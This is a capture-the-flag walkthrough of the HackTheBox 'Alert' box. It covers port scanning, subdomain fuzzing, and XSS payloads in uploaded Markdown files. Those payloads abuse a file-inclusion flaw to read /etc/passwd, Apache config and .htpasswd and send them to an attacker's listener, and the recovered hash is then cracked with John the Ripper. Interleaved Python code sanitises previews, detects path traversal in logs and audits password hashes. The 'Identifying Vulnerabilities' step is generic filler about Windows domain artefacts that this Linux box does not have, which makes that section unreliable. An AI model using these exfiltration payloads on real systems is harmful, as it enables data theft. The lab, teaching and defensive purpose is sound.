Alert HackTheBox Walkthrough
Step 1: Initial Reconnaissance and Enumeration
Initial reconnaissance means gathering information about the target: its IP address, open ports and service details. Enumeration turns that information into vulnerabilities and potential entry points. Use Nmap for port scanning and its enumeration scripts to dig deeper, and document every finding in a markdown (.md) file. Thorough reconnaissance is the foundation for every later step of the penetration test, so stay methodical and detailed.
Nmap Scan Result
Nmap Scan Result Analysis
Open Ports:
Port 22 (SSH)
- State: Open
- Service: SSH
- Version: OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Notes:
- The presence of OpenSSH suggests this service is for remote administration.
- Version 8.2p1 has known vulnerabilities (e.g., CVE-2020-15778). Check for patch status or try SSH enumeration techniques.
- The ssh-hostkey output provides three types of keys (RSA, ECDSA, ED25519), useful for fingerprinting or verifying authenticity during connection.
Port 80 (HTTP)
- State: Open
- Service: HTTP (Apache)
- Version: Apache httpd 2.4.41 ((Ubuntu))
Notes:
- The web server redirects to http://alert.htb/. This might be a virtual host; ensure the Host header is set during further exploration.
- Version 2.4.41 may have potential vulnerabilities such as CVE-2020-11984 or CVE-2020-13950. Check patch status.
- The redirected domain suggests a possible entry point for web exploitation or directory enumeration.
Filtered Ports:
Port 12227
- State: Filtered
- Service: Unknown
Notes:
- The port is filtered, meaning there is no response or it is blocked by a firewall.
- It could host an unusual or custom service. Try techniques like udp-scan, service-fingerprint, or firewalk to gather more information.
- Review firewall rules or routing configurations for further investigation.
Box Enumeration
During enumeration, I discovered two open ports: 22 and 80. Based on the room’s name, “alert,” I suspected the challenge would involve an XSS (Cross-Site Scripting) vulnerability, which appeared to be the key to solving it.
Further investigation revealed a subdomain named statistics.alert.htb during subdomain enumeration. To probe for virtual hosts, I used the following ffuf command (the wordlist path is the local file the fuzzer reads; 301 responses are filtered out because that is the default redirect):
ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w ~/wordlists.txt -fc 301
On the webpage, there was an upload feature for markdown (.md) files and a preview option that rendered the content. Initially, I attempted to extract information from uploaded .md files, but those attempts didn't yield any useful results. After experimenting with different payloads and techniques, I successfully identified and exploited an XSS vulnerability via the .md file upload feature.
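The root cause above is a preview that renders whatever HTML the uploaded Markdown produces. As an added example (not code from the original post or from the box), this is an allow-list sanitiser for that preview output; the tag and attribute lists are assumptions chosen for the illustration, not the application's real configuration.

```python
# Added example, not code from the original post: an allow-list sanitiser for
# the HTML a Markdown preview produces, so a <script> smuggled into an uploaded
# .md file is dropped instead of running in the viewer's browser. The tag and
# attribute lists are assumptions for the example.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "em", "strong", "code", "pre", "ul", "ol", "li",
                "h1", "h2", "h3", "a", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no src, no style
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class PreviewSanitizer(HTMLParser):
    """Re-emits only allow-listed tags; everything else becomes plain text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = 0     # >0 while inside <script>/<style>: drop bodies

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping += 1
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, ()) and value is not None:
                # javascript: and data: links fail the scheme allow-list
                if name == "href" and not value.lower().lstrip().startswith(SAFE_SCHEMES):
                    continue
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = max(0, self.skipping - 1)
        elif tag in ALLOWED_TAGS and not self.skipping:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data))   # text is re-escaped, never raw


def sanitize_preview(html):
    s = PreviewSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out)
```

Run the rendered preview through sanitize_preview() before storing or serving it; the fetch() payload shown later in this post produces no output at all once its script element is dropped.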
Step 2: Identifying Vulnerabilities
One crucial step in conquering Alert on HackTheBox is identifying vulnerabilities. This stage takes a thorough second look at the reconnaissance data to pinpoint weak points an attacker could exploit: examining the event logs, identifying domain admin accounts, checking for any NTDS-related anomalies, and reviewing domain controllers and open ports for areas where security may be compromised. Analysing source code and running targeted tests then shows the most effective approach to gaining root access. Vigilance and attention to detail are key in this phase of the process.
Step 3: Exploitation
Exploit the vulnerabilities discovered during enumeration of the webpage, including plaintext default credentials where applicable, and aim to gain root access quickly. Use whichever method fits, such as PHP payloads or XSS injection, and open a port on your local machine to catch a reverse shell. Get a copy of the application source so you can navigate the system and avoid falling into a rabbit hole. Persistence and escalation are what yield the credentials you need, including learning how to work with hash values, and John the Ripper, the well-known password cracker, earns bonus points here. Master the exploitation phase to advance successfully in Alert on HackTheBox.
Hosting a Malicious Server
To exfiltrate data from the target system, I set up a Python3 HTTP server on port 8888 to capture the output of my payload.
python3 -m http.server 8888
This server acted as a listener, ready to receive any data fetched and sent by the crafted exploit.
Uploading a Malicious Markdown File
The payload was embedded into a .md file containing the following malicious script:
<script>
fetch("http://alert.htb/messages.php?file=filepath")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
});
</script>
When this file was uploaded, it leveraged the application's LFI vulnerability (the file parameter of messages.php) to fetch sensitive files and send their contents to my server.
Triggering the Payload
The uploaded .md file generated a link in the application's UI. Hovering over this link revealed the payload's URL, which could be copied and triggered via the application's contact page.
As the payload executed, my Python server received Base64-encoded responses. Decoding these responses revealed sensitive files, starting with /etc/passwd, which identified two system users.
Expanding the Attack Surface
After identifying potential users, I attempted brute-forcing SSH credentials. However, these efforts were unsuccessful. Shifting focus, I explored Apache configuration files using adjusted payloads:
Fetching Apache Configurations
<script>
fetch("http://alert.htb/messages.php?file=../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
});
</script>
Extracting Apache Password Files
<script>
fetch("http://alert.htb/messages.php?file=../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
});
</script>
These payloads provided critical configuration details and a hashed credential stored in .htpasswd.
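The three payloads above all ride on one bug: messages.php hands the file parameter straight to the filesystem. As an added example (not code from the original post or from the box), this is the containment check that closes that hole, plus a detection pass over Apache access-log lines that flags requests whose file parameter leaves the expected directory. The base directory, the .md-only rule and the log lines are constructed for the example.

```python
# Added example, not code from the original post: the server-side check that
# would have closed the messages.php?file= hole used above, plus a detection
# pass over Apache access-log lines. The base directory, the .md-only rule
# and the log lines are constructed for the example.
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit


def safe_resolve(base_dir, requested):
    """Return the real path of requested if it stays inside base_dir, else None.
    realpath() collapses '..' and symlinks, so traversal and absolute paths
    cannot escape the allowed directory."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base or not target.endswith(".md"):
        return None
    return target


# Combined-log prefix: client ip ... "METHOD url proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')


def find_traversal(lines):
    """Return (ip, decoded file value, status) for every request whose file=
    parameter tries to leave the message directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for raw in parse_qs(urlsplit(m.group("url")).query).get("file", []):
            value = unquote(raw)   # parse_qs decoded once; this also catches double encoding
            if ".." in value or value.startswith("/") or "\x00" in value:
                hits.append((m.group("ip"), value, int(m.group("status"))))
    return hits


SAMPLE_LOG = [  # constructed lines, not taken from the box
    '10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /messages.php?file=2024-12.md HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Jan/2025:10:00:07 +0000] "GET /messages.php?file=../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value, status in find_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: file={value!r} -> HTTP {status}")
```

A 200 status on a flagged line means the read succeeded, which is the case to page on; a 4xx on the same pattern is an attempt worth logging but not an exposure.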
Cracking the Apache MD5 Hash
The .htpasswd file revealed a hashed password resembling:
a****t:$****$*********$**********************/
This format, specific to Apache's MD5 hashing, was easily cracked using John the Ripper with the popular rockyou.txt wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long alert.hash
Upon successful cracking, the plaintext password opened new doors for further exploration.
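Two things made this credential cheap to recover: the MD5-based $apr1$ scheme and the file sitting inside the virtual host's directory where the LFI could reach it. As an added example (not code from the original post or from the box), this audit flags both conditions; every entry and path in it is constructed.

```python
# Added example, not code from the original post: audit .htpasswd entries for
# the MD5-based $apr1$ scheme cracked above (and older crypt/SHA1/plain forms)
# and check whether the file sits under a served directory. Entries and paths
# are constructed for the example.
import os
import re

SCHEMES = [  # (pattern, name, acceptable today?)
    (re.compile(r"^\$2[aby]\$\d\d\$[./A-Za-z0-9]{53}$"), "bcrypt", True),
    (re.compile(r"^\$apr1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"), "apr1-md5", False),
    (re.compile(r"^\{SHA\}[A-Za-z0-9+/]{27}=$"), "sha1", False),
    (re.compile(r"^[./A-Za-z0-9]{13}$"), "crypt", False),
]


def audit_htpasswd(text):
    """Return (user, scheme, ok) per entry; unknown formats are treated as
    plaintext and therefore not ok."""
    report = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        for pattern, name, ok in SCHEMES:
            if pattern.match(digest):
                report.append((user, name, ok))
                break
        else:
            report.append((user, "plaintext-or-unknown", False))
    return report


def weak_users(text):
    return [user for user, _, ok in audit_htpasswd(text) if not ok]


def under_docroot(htpasswd_path, docroots):
    """True if the file lives inside any served directory, i.e. where a path
    traversal or a misconfigured alias could hand it to a client."""
    p = os.path.realpath(htpasswd_path)
    return any(os.path.commonpath([p, os.path.realpath(d)]) == os.path.realpath(d)
               for d in docroots)


SAMPLE = """\
# constructed entries, not the box's real file
webadmin:$apr1$abcdefgh$ABCDEFGHIJKLMNOPQRSTUV
ops:$2y$10$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0
legacy:{SHA}AAAAAAAAAAAAAAAAAAAAAAAAAAA=
"""
```

Apache's htpasswd -B writes bcrypt entries, so rehashing the flagged users is a one-command fix once the file has been moved out of the document root.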
Key Takeaways
- LFI and Payload Design: Combining LFI with a crafted script can enable effective exfiltration of critical files.
- Data Harvesting: Apache configuration files often contain sensitive details, making them high-value targets in web application exploits.
- Hash Cracking: Tools like John the Ripper, paired with robust wordlists, can efficiently crack common hash formats.
This process highlights the importance of securing file inclusion vulnerabilities, sanitizing user inputs, and enforcing strict access controls for sensitive files. If you’re a sysadmin or developer, implementing measures like these is vital to safeguarding your application against similar attacks.
Step 4: Flag Extraction
In the final step of conquering challenges on HackTheBox, extracting both the user flag and the root flag is essential for completing the mission. These flags serve as proof of your successful penetration and mastery of the box.
User Flag Extraction
After gaining initial access to the target system, typically through exploiting vulnerabilities, your first task is to locate the user flag. This flag is usually placed in the home directory of the user you compromised, commonly named user.txt. Use commands like cat /home/{username}/user.txt to reveal its contents. Securing the user flag is a significant milestone, marking your progression in the challenge.
Logging in as the extracted user, we get the user flag.
Root Flag Extraction
Having obtained the user flag, the next step is to escalate your privileges to root. Utilize the knowledge gained throughout your engagement, employing techniques like privilege escalation exploits or misconfigurations to gain root access. Once you are operating as the root user, locate the root flag, typically found in the root directory (/root/). The root flag is often named root.txt, and revealing its contents with cat /root/root.txt concludes your task. Collecting both flags not only demonstrates your skill in ethical hacking but also signifies the successful completion of the challenge on HackTheBox. Always remember to document your methods and findings during this process, as they are invaluable for continual learning and improvement.